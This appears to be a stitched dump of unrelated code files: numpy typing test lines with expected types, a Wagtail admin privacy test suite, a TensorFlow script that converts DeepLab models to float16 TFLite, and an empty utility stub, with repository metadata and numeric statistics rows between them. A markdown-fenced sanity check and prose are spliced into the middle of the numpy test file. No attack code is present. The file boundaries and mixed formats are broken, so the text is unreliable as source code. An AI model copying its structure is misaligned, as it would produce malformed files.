reveal_type(f8 + f4) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(f8 + i4) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(f8 + b_) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(f8 + b) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(f8 + c) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(f8 + f) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(f8 + i) # E: numpy.floating[Any]
reveal_type(f8 + AR) # E: Union[numpy.ndarray, numpy.generic]
reveal_type(f8 + f8) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(i8 + f8) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(f4 + f8) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(i4 + f8) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(b_ + f8) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(b + f8) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(c + f8) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(f + f8) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(i + f8) # E: numpy.floating[Any]
reveal_type(AR + f8) # E: Union[numpy.ndarray, numpy.generic]
reveal_type(f4 + f8) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(f4 + i8) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(f4 + f4) # E: numpy.floating[numpy.typing._32Bit]
reveal_type(f4 + i4) # E: numpy.floating[numpy.typing._32Bit]
reveal_type(f4 + b_) # E: numpy.floating[numpy.typing._32Bit]
reveal_type(f4 + b) # E: numpy.floating[numpy.typing._32Bit]
reveal_type(f4 + c) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(f4 + f) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(f4 + i) # E: numpy.floating[Any]
reveal_type(f4 + AR) # E: Union[numpy.ndarray, numpy.generic]
reveal_type(f8 + f4) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(i8 + f4) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(f4 + f4) # E: numpy.floating[numpy.typing._32Bit]
reveal_type(i4 + f4) # E: numpy.floating[numpy.typing._32Bit]
reveal_type(b_ + f4) # E: numpy.floating[numpy.typing._32Bit]
reveal_type(b + f4) # E: numpy.floating[numpy.typing._32Bit]
reveal_type(c + f4) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(f + f4) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(i + f4) # E: numpy.floating[Any]
reveal_type(AR + f4) # E: Union[numpy.ndarray, numpy.generic]
# Int
reveal_type(i8 + i8) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(i8 + u8) # E: Union[numpy.signedinteger[Any], numpy.floating[numpy.typing._64Bit]]
reveal_type(i8 + i4) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(i8 + u4) # E: Union[numpy.signedinteger[Any], numpy.floating[numpy.typing._64Bit]]
reveal_type(i8 + b_) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(i8 + b) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(i8 + c) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(i8 + f) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(i8 + i) # E: numpy.signedinteger[Any]
reveal_type(i8 + AR) # E: Union[numpy.ndarray, numpy.generic]
reveal_type(u8 + u8) # E: numpy.unsignedinteger[numpy.typing._64Bit]
reveal_type(u8 + i4) # E: Union[numpy.signedinteger[Any], numpy.floating[numpy.typing._64Bit]]
reveal_type(u8 + u4) # E: numpy.unsignedinteger[numpy.typing._64Bit]
reveal_type(u8 + b_) # E: numpy.unsignedinteger[numpy.typing._64Bit]
reveal_type(u8 + b) # E: numpy.unsignedinteger[numpy.typing._64Bit]
reveal_type(u8 + c) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(u8 + f) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(u8 + i) # E: Union[numpy.signedinteger[Any], numpy.floating[numpy.typing._64Bit]]
reveal_type(u8 + AR) # E: Union[numpy.ndarray, numpy.generic]
reveal_type(i8 + i8) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(u8 + i8) # E: Union[numpy.signedinteger[Any], numpy.floating[numpy.typing._64Bit]]
reveal_type(i4 + i8) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(u4 + i8) # E: Union[numpy.signedinteger[Any], numpy.floating[numpy.typing._64Bit]]
reveal_type(b_ + i8) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(b + i8) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(c + i8) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(f + i8) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(i + i8) # E: numpy.signedinteger[Any]
reveal_type(AR + i8) # E: Union[numpy.ndarray, numpy.generic]
reveal_type(u8 + u8) # E: numpy.unsignedinteger[numpy.typing._64Bit]
reveal_type(i4 + u8) # E: Union[numpy.signedinteger[Any], numpy.floating[numpy.typing._64Bit]]
reveal_type(u4 + u8) # E: numpy.unsignedinteger[numpy.typing._64Bit]
reveal_type(b_ + u8) # E: numpy.unsignedinteger[numpy.typing._64Bit]
reveal_type(b + u8) # E: numpy.unsignedinteger[numpy.typing._64Bit]
reveal_type(c + u8) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(f + u8) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(i + u8) # E: Union[numpy.signedinteger[Any], numpy.floating[numpy.typing._64Bit]]
reveal_type(AR + u8) # E: Union[numpy.ndarray, numpy.generic]
reveal_type(i4 + i8) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(i4 + i4) # E: numpy.signedinteger[numpy.typing._32Bit]
reveal_type(i4 + i) # E: numpy.signedinteger[Any]
reveal_type(i4 + b_) # E: numpy.signedinteger[numpy.typing._32Bit]
reveal_type(i4 + b) # E: numpy.signedinteger[numpy.typing._32Bit]
reveal_type(i4 + AR) # E: Union[numpy.ndarray, numpy.generic]
reveal_type(u4 + i8) # E: Union[numpy.signedinteger[Any], numpy.floating[numpy.typing._64Bit]]
reveal_type(u4 + i4) # E: Union[numpy.signedinteger[Any], numpy.floating[numpy.typing._64Bit]]
reveal_type(u4 + u8) # E: numpy.unsignedinteger[numpy.typing._64Bit]
reveal_type(u4 + u4) # E: numpy.unsignedinteger[numpy.typing._32Bit]
reveal_type(u4 + i) # E: Union[numpy.signedinteger[Any], numpy.floating[numpy.typing._64Bit]]
reveal_type(u4 + b_) # E: numpy.unsignedinteger[numpy.typing._32Bit]
reveal_type(u4 + b) # E: numpy.unsignedinteger[numpy.typing._32Bit]
reveal_type(u4 + AR) # E: Union[numpy.ndarray, numpy.generic]
reveal_type(i8 + i4) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(i4 + i4) # E: numpy.signedinteger[numpy.typing._32Bit]
reveal_type(i + i4) # E: numpy.signedinteger[Any]
reveal_type(b_ + i4) # E: numpy.signedinteger[numpy.typing._32Bit]
reveal_type(b + i4) # E: numpy.signedinteger[numpy.typing._32Bit]
reveal_type(AR + i4) # E: Union[numpy.ndarray, numpy.generic]
reveal_type(i8 + u4) # E: Union[numpy.signedinteger[Any], numpy.floating[numpy.typing._64Bit]]
reveal_type(i4 + u4) # E: Union[numpy.signedinteger[Any], numpy.floating[numpy.typing._64Bit]]
reveal_type(u8 + u4) # E: numpy.unsignedinteger[numpy.typing._64Bit]
reveal_type(u4 + u4) # E: numpy.unsignedinteger[numpy.typing._32Bit]
reveal_type(b_ + u4) # E: numpy.unsignedinteger[numpy.typing._32Bit]
reveal_type(b + u4) # E: numpy.unsignedinteger[numpy.typing._32Bit]
reveal_type(i + u4) # E: Union[numpy.signedinteger[Any], numpy.floating[numpy.typing._64Bit]]
reveal_type(AR + u4) # E: Union[numpy.ndarray, numpy.generic]
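# The `# E:` comments above are the types mypy is expected to reveal from
# numpy's stubs, and most of them mirror runtime scalar promotion. A small
# sanity sketch (restricted to promotions whose result is the same under
# both legacy and NEP 50 promotion rules, so it is version-stable):

```python
import numpy as np

# Spot-check a few promotions asserted above.
assert type(np.float64() + np.float32()) is np.float64        # f8 + f4
assert type(np.complex128() + np.float64()) is np.complex128  # c16 + f8
assert type(np.int64() + np.int32()) is np.int64              # i8 + i4
assert type(-np.timedelta64(0, "D")) is np.timedelta64        # -td
print("promotion checks passed")
```

Promotions that mix Python builtins with fixed-width scalars (e.g. `f4 + i`) are deliberately left out, since their runtime result changed with NEP 50.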
# wagtail-repository/wagtail/admin/tests/test_privacy.py
# from TobiasSkovgaardJepsen/wagtail-on-heroku @ 17e4720f86023225e0704890688998a80bb87a17 (BSD-3-Clause)

from django.contrib.auth.models import Group
from django.test import TestCase
from django.urls import reverse

from wagtail.tests.testapp.models import SimplePage
from wagtail.tests.utils import WagtailTestUtils
from wagtail.core.models import Page, PageViewRestriction


class TestSetPrivacyView(TestCase, WagtailTestUtils):
    def setUp(self):
        self.login()

        # Create some pages
        self.homepage = Page.objects.get(id=2)

        self.public_page = self.homepage.add_child(instance=SimplePage(
            title="Public page",
            content="hello",
            live=True,
        ))

        self.private_page = self.homepage.add_child(instance=SimplePage(
            title="Private page",
            content="hello",
            live=True,
        ))
        PageViewRestriction.objects.create(
            page=self.private_page, restriction_type='password', password='password123'
        )

        self.private_child_page = self.private_page.add_child(instance=SimplePage(
            title="Private child page",
            content="hello",
            live=True,
        ))

        self.private_groups_page = self.homepage.add_child(instance=SimplePage(
            title="Private groups page",
            content="hello",
            live=True,
        ))
        restriction = PageViewRestriction.objects.create(page=self.private_groups_page, restriction_type='groups')
        self.group = Group.objects.create(name='Private page group')
        self.group2 = Group.objects.create(name='Private page group2')
        restriction.groups.add(self.group)
        restriction.groups.add(self.group2)

        self.private_groups_child_page = self.private_groups_page.add_child(instance=SimplePage(
            title="Private groups child page",
            content="hello",
            live=True,
        ))

    def test_get_public(self):
        """
        This tests that a blank form is returned when a user opens the set_privacy view on a public page
        """
        response = self.client.get(reverse('wagtailadmin_pages:set_privacy', args=(self.public_page.id, )))

        # Check response
        self.assertEqual(response.status_code, 200)
        self.assertTemplateUsed(response, 'wagtailadmin/page_privacy/set_privacy.html')
        self.assertEqual(response.context['page'].specific, self.public_page)

        # Check form attributes
        self.assertEqual(response.context['form']['restriction_type'].value(), 'none')

    def test_get_private(self):
        """
        This tests that the restriction type and password fields are set correctly
        when a user opens the set_privacy view on a private page
        """
        response = self.client.get(reverse('wagtailadmin_pages:set_privacy', args=(self.private_page.id, )))

        # Check response
        self.assertEqual(response.status_code, 200)
        self.assertTemplateUsed(response, 'wagtailadmin/page_privacy/set_privacy.html')
        self.assertEqual(response.context['page'].specific, self.private_page)

        # Check form attributes
        self.assertEqual(response.context['form']['restriction_type'].value(), 'password')
        self.assertEqual(response.context['form']['password'].value(), 'password123')
        self.assertEqual(response.context['form']['groups'].value(), [])

    def test_get_private_child(self):
        """
        This tests that the set_privacy view tells the user
        that the password restriction has been applied to an ancestor
        """
        response = self.client.get(reverse('wagtailadmin_pages:set_privacy', args=(self.private_child_page.id, )))

        # Check response
        self.assertEqual(response.status_code, 200)
        self.assertTemplateUsed(response, 'wagtailadmin/page_privacy/ancestor_privacy.html')
        self.assertEqual(response.context['page_with_restriction'].specific, self.private_page)

    def test_set_password_restriction(self):
        """
        This tests that setting a password restriction using the set_privacy view works
        """
        post_data = {
            'restriction_type': 'password',
            'password': 'helloworld',
            'groups': [],
        }
        response = self.client.post(reverse('wagtailadmin_pages:set_privacy', args=(self.public_page.id, )), post_data)

        # Check response
        self.assertEqual(response.status_code, 200)
        self.assertContains(response, "modal.respond('setPermission', false);")

        # Check that a page restriction has been created
        self.assertTrue(PageViewRestriction.objects.filter(page=self.public_page).exists())
        restriction = PageViewRestriction.objects.get(page=self.public_page)

        # Check that the password is set correctly
        self.assertEqual(restriction.password, 'helloworld')

        # Check that the restriction_type is set correctly
        self.assertEqual(restriction.restriction_type, 'password')

        # Be sure there are no groups set
        self.assertEqual(restriction.groups.count(), 0)

    def test_set_password_restriction_password_unset(self):
        """
        This tests that the password field on the form is validated correctly
        """
        post_data = {
            'restriction_type': 'password',
            'password': '',
            'groups': [],
        }
        response = self.client.post(reverse('wagtailadmin_pages:set_privacy', args=(self.public_page.id, )), post_data)

        # Check response
        self.assertEqual(response.status_code, 200)

        # Check that a form error was raised
        self.assertFormError(response, 'form', 'password', "This field is required.")

    def test_unset_password_restriction(self):
        """
        This tests that removing a password restriction using the set_privacy view works
        """
        post_data = {
            'restriction_type': 'none',
            'password': '',
            'groups': [],
        }
        response = self.client.post(
            reverse('wagtailadmin_pages:set_privacy', args=(self.private_page.id, )), post_data)

        # Check response
        self.assertEqual(response.status_code, 200)
        self.assertContains(response, "modal.respond('setPermission', true);")

        # Check that the page restriction has been deleted
        self.assertFalse(PageViewRestriction.objects.filter(page=self.private_page).exists())

    def test_get_private_groups(self):
        """
        This tests that the restriction type and group fields are set correctly
        when a user opens the set_privacy view on a group-restricted page
        """
        response = self.client.get(reverse('wagtailadmin_pages:set_privacy', args=(self.private_groups_page.id, )))

        # Check response
        self.assertEqual(response.status_code, 200)
        self.assertTemplateUsed(response, 'wagtailadmin/page_privacy/set_privacy.html')
        self.assertEqual(response.context['page'].specific, self.private_groups_page)

        # Check form attributes
        self.assertEqual(response.context['form']['restriction_type'].value(), 'groups')
        self.assertEqual(response.context['form']['password'].value(), '')
        self.assertEqual(response.context['form']['groups'].value(), [self.group.id, self.group2.id])

    def test_set_group_restriction(self):
        """
        This tests that setting a group restriction using the set_privacy view works
        """
        post_data = {
            'restriction_type': 'groups',
            'password': '',
            'groups': [self.group.id, self.group2.id],
        }
        response = self.client.post(reverse('wagtailadmin_pages:set_privacy', args=(self.public_page.id, )), post_data)

        # Check response
        self.assertEqual(response.status_code, 200)
        self.assertContains(response, "modal.respond('setPermission', false);")

        # Check that a page restriction has been created
        self.assertTrue(PageViewRestriction.objects.filter(page=self.public_page).exists())
        restriction = PageViewRestriction.objects.get(page=self.public_page)

        # restriction_type should be 'groups'
        self.assertEqual(restriction.restriction_type, 'groups')

        # Be sure there is no password set
        self.assertEqual(restriction.password, '')

        # Check that the groups are set correctly
        self.assertEqual(
            set(PageViewRestriction.objects.get(page=self.public_page).groups.all()),
            set([self.group, self.group2])
        )

    def test_set_group_restriction_password_unset(self):
        """
        This tests that the group fields on the form are validated correctly
        """
        post_data = {
            'restriction_type': 'groups',
            'password': '',
            'groups': [],
        }
        response = self.client.post(reverse('wagtailadmin_pages:set_privacy', args=(self.public_page.id, )), post_data)

        # Check response
        self.assertEqual(response.status_code, 200)

        # Check that a form error was raised
        self.assertFormError(response, 'form', 'groups', "Please select at least one group.")

    def test_unset_group_restriction(self):
        """
        This tests that removing a groups restriction using the set_privacy view works
        """
        post_data = {
            'restriction_type': 'none',
            'password': '',
            'groups': [],
        }
        response = self.client.post(reverse('wagtailadmin_pages:set_privacy', args=(self.private_page.id, )), post_data)

        # Check response
        self.assertEqual(response.status_code, 200)
        self.assertContains(response, "modal.respond('setPermission', true);")

        # Check that the page restriction has been deleted
        self.assertFalse(PageViewRestriction.objects.filter(page=self.private_page).exists())


class TestPrivacyIndicators(TestCase, WagtailTestUtils):
    def setUp(self):
        self.login()

        # Create some pages
        self.homepage = Page.objects.get(id=2)

        self.public_page = self.homepage.add_child(instance=SimplePage(
            title="Public page",
            content="hello",
            live=True,
        ))

        self.private_page = self.homepage.add_child(instance=SimplePage(
            title="Private page",
            content="hello",
            live=True,
        ))
        PageViewRestriction.objects.create(
            page=self.private_page, restriction_type='password', password='password123'
        )

        self.private_child_page = self.private_page.add_child(instance=SimplePage(
            title="Private child page",
            content="hello",
            live=True,
        ))

    def test_explorer_public(self):
        """
        This tests that the privacy indicator on the public page's explore view is set to "PUBLIC"
        """
        response = self.client.get(reverse('wagtailadmin_explore', args=(self.public_page.id, )))

        # Check the response
        self.assertEqual(response.status_code, 200)

        # Check the privacy indicator is public
        self.assertTemplateUsed(response, 'wagtailadmin/pages/_privacy_switch.html')
        self.assertContains(response, '<div class="privacy-indicator public">')
        self.assertNotContains(response, '<div class="privacy-indicator private">')

    def test_explorer_private(self):
        """
        This tests that the privacy indicator on the private page's explore view is set to "PRIVATE"
        """
        response = self.client.get(reverse('wagtailadmin_explore', args=(self.private_page.id, )))

        # Check the response
        self.assertEqual(response.status_code, 200)

        # Check the privacy indicator is private
        self.assertTemplateUsed(response, 'wagtailadmin/pages/_privacy_switch.html')
        self.assertContains(response, '<div class="privacy-indicator private">')
        self.assertNotContains(response, '<div class="privacy-indicator public">')

    def test_explorer_private_child(self):
        """
        This tests that the privacy indicator on the private child page's explore view is set to "PRIVATE"
        """
        response = self.client.get(reverse('wagtailadmin_explore', args=(self.private_child_page.id, )))

        # Check the response
        self.assertEqual(response.status_code, 200)

        # Check the privacy indicator is private
        self.assertTemplateUsed(response, 'wagtailadmin/pages/_privacy_switch.html')
        self.assertContains(response, '<div class="privacy-indicator private">')
        self.assertNotContains(response, '<div class="privacy-indicator public">')

    def test_explorer_list_homepage(self):
        """
        This tests that there is a padlock displayed next to the private page in the homepage's explorer listing
        """
        response = self.client.get(reverse('wagtailadmin_explore', args=(self.homepage.id, )))

        # Check the response
        self.assertEqual(response.status_code, 200)

        # Must have one privacy icon (next to the private page)
        self.assertContains(response, "<span class=\"indicator privacy-indicator icon icon-no-view\"", count=1)

    def test_explorer_list_private(self):
        """
        This tests that there is a padlock displayed
        next to the private child page in the private page's explorer listing
        """
        response = self.client.get(reverse('wagtailadmin_explore', args=(self.private_page.id, )))

        # Check the response
        self.assertEqual(response.status_code, 200)

        # Must have one privacy icon (next to the private child page)
        self.assertContains(response, "<span class=\"indicator privacy-indicator icon icon-no-view\"", count=1)

    def test_edit_public(self):
        """
        This tests that the privacy indicator on the public page's edit view is set to "PUBLIC"
        """
        response = self.client.get(reverse('wagtailadmin_pages:edit', args=(self.public_page.id, )))

        # Check the response
        self.assertEqual(response.status_code, 200)

        # Check the privacy indicator is public
        self.assertTemplateUsed(response, 'wagtailadmin/pages/_privacy_switch.html')
        self.assertContains(response, '<div class="privacy-indicator public">')
        self.assertNotContains(response, '<div class="privacy-indicator private">')

    def test_edit_private(self):
        """
        This tests that the privacy indicator on the private page's edit view is set to "PRIVATE"
        """
        response = self.client.get(reverse('wagtailadmin_pages:edit', args=(self.private_page.id, )))

        # Check the response
        self.assertEqual(response.status_code, 200)

        # Check the privacy indicator is private
        self.assertTemplateUsed(response, 'wagtailadmin/pages/_privacy_switch.html')
        self.assertContains(response, '<div class="privacy-indicator private">')
        self.assertNotContains(response, '<div class="privacy-indicator public">')

    def test_edit_private_child(self):
        """
        This tests that the privacy indicator on the private child page's edit view is set to "PRIVATE"
        """
        response = self.client.get(reverse('wagtailadmin_pages:edit', args=(self.private_child_page.id, )))

        # Check the response
        self.assertEqual(response.status_code, 200)

        # Check the privacy indicator is private
        self.assertTemplateUsed(response, 'wagtailadmin/pages/_privacy_switch.html')
        self.assertContains(response, '<div class="privacy-indicator private">')
        self.assertNotContains(response, '<div class="privacy-indicator public">')
| 40.939791 | 134 | 0.659569 | 1,752 | 15,639 | 5.763128 | 0.0879 | 0.042785 | 0.066059 | 0.030306 | 0.877686 | 0.858077 | 0.820442 | 0.76389 | 0.743389 | 0.737348 | 0 | 0.00618 | 0.23435 | 15,639 | 381 | 135 | 41.047244 | 0.837064 | 0.18748 | 0 | 0.606796 | 0 | 0 | 0.184443 | 0.09856 | 0 | 0 | 0 | 0 | 0.334951 | 1 | 0.097087 | false | 0.101942 | 0.029126 | 0 | 0.135922 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
8a80396fab65436dec17e8fa17395034af49db54 | 5,311 | py | Python | 21_edgetpu-deeplab-slim/01_float32/05_float16_quantization.py | khanfarhan10/PINTO_model_zoo | 4cad2e506d8c0fb604aa7b5f84115a840ab59ba1 | [
"MIT"
] | 1,529 | 2019-12-11T13:36:23.000Z | 2022-03-31T18:38:27.000Z | 21_edgetpu-deeplab-slim/01_float32/05_float16_quantization.py | khanfarhan10/PINTO_model_zoo | 4cad2e506d8c0fb604aa7b5f84115a840ab59ba1 | [
"MIT"
] | 200 | 2020-01-06T09:24:42.000Z | 2022-03-31T17:29:08.000Z | 21_edgetpu-deeplab-slim/01_float32/05_float16_quantization.py | khanfarhan10/PINTO_model_zoo | 4cad2e506d8c0fb604aa7b5f84115a840ab59ba1 | [
"MIT"
] | 288 | 2020-02-21T14:56:02.000Z | 2022-03-30T03:00:35.000Z | ### Tensorflow v1.15.2
import tensorflow as tf

# Float16 Quantization - Input/Output=float32
graph_def_file = "frozen_inference_graph_257_os16.pb"
input_arrays = ["ImageTensor"]
output_arrays = ['ArgMax']
input_tensor = {"ImageTensor": [1, 257, 257, 3]}
converter = tf.lite.TFLiteConverter.from_frozen_graph(graph_def_file, input_arrays, output_arrays, input_tensor)
converter.optimizations = [tf.lite.Optimize.DEFAULT]
converter.target_spec.supported_types = [tf.float16]
tflite_quant_model = converter.convert()
with open('./edgetpu_deeplab_slim_257_os16_float16_quant.tflite', 'wb') as w:
    w.write(tflite_quant_model)
print("Float16 Quantization complete! - edgetpu_deeplab_slim_257_os16_float16_quant.tflite")

# Float16 Quantization - Input/Output=float32
graph_def_file = "frozen_inference_graph_257_os32.pb"
input_arrays = ["ImageTensor"]
output_arrays = ['ArgMax']
input_tensor = {"ImageTensor": [1, 257, 257, 3]}
converter = tf.lite.TFLiteConverter.from_frozen_graph(graph_def_file, input_arrays, output_arrays, input_tensor)
converter.optimizations = [tf.lite.Optimize.DEFAULT]
converter.target_spec.supported_types = [tf.float16]
tflite_quant_model = converter.convert()
with open('./edgetpu_deeplab_slim_257_os32_float16_quant.tflite', 'wb') as w:
    w.write(tflite_quant_model)
print("Float16 Quantization complete! - edgetpu_deeplab_slim_257_os32_float16_quant.tflite")

# Float16 Quantization - Input/Output=float32
graph_def_file = "frozen_inference_graph_321_os16.pb"
input_arrays = ["ImageTensor"]
output_arrays = ['ArgMax']
input_tensor = {"ImageTensor": [1, 321, 321, 3]}
converter = tf.lite.TFLiteConverter.from_frozen_graph(graph_def_file, input_arrays, output_arrays, input_tensor)
converter.optimizations = [tf.lite.Optimize.DEFAULT]
converter.target_spec.supported_types = [tf.float16]
tflite_quant_model = converter.convert()
with open('./edgetpu_deeplab_slim_321_os16_float16_quant.tflite', 'wb') as w:
    w.write(tflite_quant_model)
print("Float16 Quantization complete! - edgetpu_deeplab_slim_321_os16_float16_quant.tflite")

# Float16 Quantization - Input/Output=float32
graph_def_file = "frozen_inference_graph_321_os32.pb"
input_arrays = ["ImageTensor"]
output_arrays = ['ArgMax']
input_tensor = {"ImageTensor": [1, 321, 321, 3]}
converter = tf.lite.TFLiteConverter.from_frozen_graph(graph_def_file, input_arrays, output_arrays, input_tensor)
converter.optimizations = [tf.lite.Optimize.DEFAULT]
converter.target_spec.supported_types = [tf.float16]
tflite_quant_model = converter.convert()
with open('./edgetpu_deeplab_slim_321_os32_float16_quant.tflite', 'wb') as w:
    w.write(tflite_quant_model)
print("Float16 Quantization complete! - edgetpu_deeplab_slim_321_os32_float16_quant.tflite")

# Float16 Quantization - Input/Output=float32
graph_def_file = "frozen_inference_graph_513_os16.pb"
input_arrays = ["ImageTensor"]
output_arrays = ['ArgMax']
input_tensor = {"ImageTensor": [1, 513, 513, 3]}
converter = tf.lite.TFLiteConverter.from_frozen_graph(graph_def_file, input_arrays, output_arrays, input_tensor)
converter.optimizations = [tf.lite.Optimize.DEFAULT]
converter.target_spec.supported_types = [tf.float16]
tflite_quant_model = converter.convert()
with open('./edgetpu_deeplab_slim_513_os16_float16_quant.tflite', 'wb') as w:
    w.write(tflite_quant_model)
print("Float16 Quantization complete! - edgetpu_deeplab_slim_513_os16_float16_quant.tflite")

# Float16 Quantization - Input/Output=float32
graph_def_file = "frozen_inference_graph_513_os32.pb"
input_arrays = ["ImageTensor"]
output_arrays = ['ArgMax']
input_tensor = {"ImageTensor": [1, 513, 513, 3]}
converter = tf.lite.TFLiteConverter.from_frozen_graph(graph_def_file, input_arrays, output_arrays, input_tensor)
converter.optimizations = [tf.lite.Optimize.DEFAULT]
converter.target_spec.supported_types = [tf.float16]
tflite_quant_model = converter.convert()
with open('./edgetpu_deeplab_slim_513_os32_float16_quant.tflite', 'wb') as w:
    w.write(tflite_quant_model)
print("Float16 Quantization complete! - edgetpu_deeplab_slim_513_os32_float16_quant.tflite")

# Float16 Quantization - Input/Output=float32
graph_def_file = "frozen_inference_graph_769_os16.pb"
input_arrays = ["ImageTensor"]
output_arrays = ['ArgMax']
input_tensor = {"ImageTensor": [1, 769, 769, 3]}
converter = tf.lite.TFLiteConverter.from_frozen_graph(graph_def_file, input_arrays, output_arrays, input_tensor)
converter.optimizations = [tf.lite.Optimize.DEFAULT]
converter.target_spec.supported_types = [tf.float16]
tflite_quant_model = converter.convert()
with open('./edgetpu_deeplab_slim_769_os16_float16_quant.tflite', 'wb') as w:
    w.write(tflite_quant_model)
print("Float16 Quantization complete! - edgetpu_deeplab_slim_769_os16_float16_quant.tflite")

# Float16 Quantization - Input/Output=float32
graph_def_file = "frozen_inference_graph_769_os32.pb"
input_arrays = ["ImageTensor"]
output_arrays = ['ArgMax']
input_tensor = {"ImageTensor": [1, 769, 769, 3]}
converter = tf.lite.TFLiteConverter.from_frozen_graph(graph_def_file, input_arrays, output_arrays, input_tensor)
converter.optimizations = [tf.lite.Optimize.DEFAULT]
converter.target_spec.supported_types = [tf.float16]
tflite_quant_model = converter.convert()
with open('./edgetpu_deeplab_slim_769_os32_float16_quant.tflite', 'wb') as w:
    w.write(tflite_quant_model)
print("Float16 Quantization complete! - edgetpu_deeplab_slim_769_os32_float16_quant.tflite") | 49.635514 | 111 | 0.824515 | 736 | 5,311 | 5.580163 | 0.074728 | 0.07402 | 0.046749 | 0.058437 | 0.991478 | 0.991478 | 0.991478 | 0.991478 | 0.986121 | 0.986121 | 0 | 0.056891 | 0.060064 | 5,311 | 107 | 112 | 49.635514 | 0.765825 | 0.069667 | 0 | 0.719101 | 0 | 0 | 0.322921 | 0.22069 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.011236 | 0 | 0.011236 | 0.089888 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
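The eight conversion blocks in the script above differ only in input size (257/321/513/769) and output stride (16/32). As a hedged sketch — not part of the original repository, and assuming the same TF 1.15 `tf.lite.TFLiteConverter.from_frozen_graph` API the script already uses — the repetition could be driven from a small config table:

```python
def make_configs(sizes=(257, 321, 513, 769), strides=(16, 32)):
    """Enumerate the (graph file, output file, input shape) variants
    covered by the eight hand-written blocks above."""
    configs = []
    for size in sizes:
        for os_ in strides:
            configs.append({
                "graph": f"frozen_inference_graph_{size}_os{os_}.pb",
                "out": f"edgetpu_deeplab_slim_{size}_os{os_}_float16_quant.tflite",
                "shape": [1, size, size, 3],
            })
    return configs


def convert_all(configs):
    """Run the same float16 post-training quantization for each variant.
    Mirrors the per-block logic of the original script (TF 1.15)."""
    import tensorflow as tf  # deferred so the config helper stays import-free
    for cfg in configs:
        converter = tf.lite.TFLiteConverter.from_frozen_graph(
            cfg["graph"], ["ImageTensor"], ["ArgMax"],
            {"ImageTensor": cfg["shape"]})
        converter.optimizations = [tf.lite.Optimize.DEFAULT]
        converter.target_spec.supported_types = [tf.float16]
        with open("./" + cfg["out"], "wb") as w:
            w.write(converter.convert())
        print("Float16 Quantization complete! - " + cfg["out"])
```

Calling `convert_all(make_configs())` would reproduce the eight conversions; the filename and shape patterns are derived directly from the blocks above, but treat the refactor itself as illustrative.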
8a850d85168829154d651cefc0ad2cf456b90498 | 143 | py | Python | safeai/utils/utils.py | HanbumKo/SafeAI | ad7e5d66abcfe82b0de260b606853bddb68e68ee | [
"MIT"
] | 13 | 2018-11-02T12:10:01.000Z | 2020-05-18T17:38:25.000Z | safeai/utils/utils.py | HanbumKo/SafeAI | ad7e5d66abcfe82b0de260b606853bddb68e68ee | [
"MIT"
] | 2 | 2018-11-15T06:16:06.000Z | 2018-11-19T15:23:04.000Z | safeai/utils/utils.py | HanbumKo/SafeAI | ad7e5d66abcfe82b0de260b606853bddb68e68ee | [
"MIT"
] | 4 | 2018-11-23T05:59:43.000Z | 2020-08-28T04:21:27.000Z | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# General utility functions here
